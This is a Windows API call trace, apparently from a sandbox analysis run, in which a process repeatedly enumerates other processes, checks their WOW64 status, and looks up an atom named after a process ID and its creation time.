	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.550] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.550] CloseHandle (hObject=0x248) returned 1
	[0094.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.550] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.550] CloseHandle (hObject=0x248) returned 1
	[0094.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.550] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.550] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.551] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.551] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.551] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.551] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.551] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.551] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.551] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.551] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.551] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.551] CloseHandle (hObject=0x248) returned 1
	[0094.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.552] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.552] CloseHandle (hObject=0x248) returned 1
	[0094.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.552] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.552] CloseHandle (hObject=0x248) returned 1
	[0094.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.552] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.552] CloseHandle (hObject=0x248) returned 1
	[0094.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.552] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.552] CloseHandle (hObject=0x248) returned 1
	[0094.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.553] CloseHandle (hObject=0x248) returned 1
	[0094.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.553] CloseHandle (hObject=0x248) returned 1
	[0094.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.553] CloseHandle (hObject=0x248) returned 1
	[0094.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.553] CloseHandle (hObject=0x248) returned 1
	[0094.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.553] CloseHandle (hObject=0x248) returned 1
	[0094.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.553] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.554] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.554] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.554] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.554] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.554] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.554] CloseHandle (hObject=0x248) returned 1
	[0094.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.555] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.555] CloseHandle (hObject=0x248) returned 1
	[0094.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.555] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.555] CloseHandle (hObject=0x248) returned 1
	[0094.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.555] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.555] CloseHandle (hObject=0x248) returned 1
	[0094.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.555] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.555] CloseHandle (hObject=0x248) returned 1
	[0094.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.555] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.555] CloseHandle (hObject=0x248) returned 1
	[0094.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.556] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.556] CloseHandle (hObject=0x248) returned 1
	[0094.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.556] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.556] CloseHandle (hObject=0x248) returned 1
	[0094.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.556] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.556] CloseHandle (hObject=0x248) returned 1
	[0094.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.557] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.557] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.557] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.557] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.557] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.557] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.557] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.558] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.558] CloseHandle (hObject=0x248) returned 1
	[0094.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.558] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.558] CloseHandle (hObject=0x248) returned 1
	[0094.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.667] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.667] CloseHandle (hObject=0x248) returned 1
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.668] CloseHandle (hObject=0x248) returned 1
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.668] CloseHandle (hObject=0x248) returned 1
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.668] CloseHandle (hObject=0x248) returned 1
	[0094.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.668] CloseHandle (hObject=0x248) returned 1
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.669] CloseHandle (hObject=0x248) returned 1
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.669] CloseHandle (hObject=0x248) returned 1
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.669] CloseHandle (hObject=0x248) returned 1
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.669] CloseHandle (hObject=0x248) returned 1
	[0094.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.669] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.670] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.671] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.671] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.671] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.671] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.671] CloseHandle (hObject=0x248) returned 1
	[0094.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.672] CloseHandle (hObject=0x248) returned 1
	[0094.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.672] CloseHandle (hObject=0x248) returned 1
	[0094.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.672] CloseHandle (hObject=0x248) returned 1
	[0094.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.672] CloseHandle (hObject=0x248) returned 1
	[0094.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.672] CloseHandle (hObject=0x248) returned 1
	[0094.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.673] CloseHandle (hObject=0x248) returned 1
	[0094.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.673] CloseHandle (hObject=0x248) returned 1
	[0094.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.673] CloseHandle (hObject=0x248) returned 1
	[0094.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.673] CloseHandle (hObject=0x248) returned 1
	[0094.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.673] CloseHandle (hObject=0x248) returned 1
	[0094.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.674] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.674] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.674] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.674] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.675] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.675] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.675] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.675] CloseHandle (hObject=0x248) returned 1
	[0094.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.675] CloseHandle (hObject=0x248) returned 1
	[0094.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.811] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.811] CloseHandle (hObject=0x248) returned 1
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.811] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.811] CloseHandle (hObject=0x248) returned 1
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
